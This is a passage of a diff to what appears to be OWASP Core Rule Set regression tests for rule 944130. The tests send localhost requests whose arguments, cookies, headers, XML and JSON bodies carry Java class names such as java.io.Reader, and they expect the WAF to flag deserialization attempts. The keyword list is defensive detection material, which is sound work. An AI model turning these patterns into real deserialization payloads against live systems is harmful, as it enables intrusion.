dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-235 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 235 desc: "Cookie name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.PushbackInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-236 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: java.io.PushbackInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 236 desc: "Request header test includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.PushbackInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-237 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.PushbackInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 237 desc: "XML attribute value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-238 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 238 desc: "XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-239 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 239 desc: "Nested XML element value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PushbackInputStream" - output: - log_contains: "id 
\"944130\"" - - test_title: 944130-240 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 240 desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PushbackInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-241 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 241 desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - 
Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.PushbackInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-242 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 242 desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.PushbackInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-243 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 243 desc: "Argument test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-244 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 244 desc: "Argument name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-245 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_id: 245 desc: "Cookie test includes keyword 
java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-246 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 246 desc: "Cookie name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.Reader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-247 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 247 desc: "Request header test includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.Reader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-248 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 248 desc: "XML attribute value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-249 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 249 desc: "XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-250 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 250 desc: "Nested XML element value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-251 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 
"localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 251 desc: "Content-Type text/plain includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.Reader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-252 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_id: 252 desc: "Content-Type application/json arg value includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.Reader\"}" - output: - log_contains: "id \"944130\"" - 
- test_title: 944130-253 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 253 desc: "Content-Type application/json arg name includes keyword java.io.Reader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.Reader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-254 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 254 desc: "Argument test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-255 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 255 desc: "Argument name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-256 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 256 desc: "Cookie test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-257 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 257 desc: "Cookie name includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.StringReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-258 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + 
log_contains: "id \"944130\"" + - test_id: 258 desc: "Request header test includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.StringReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-259 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 259 desc: "XML attribute value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-260 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 260 desc: "XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-261 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_id: 261 desc: "Nested XML element value includes keyword java.io.StringReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.StringReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-262 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
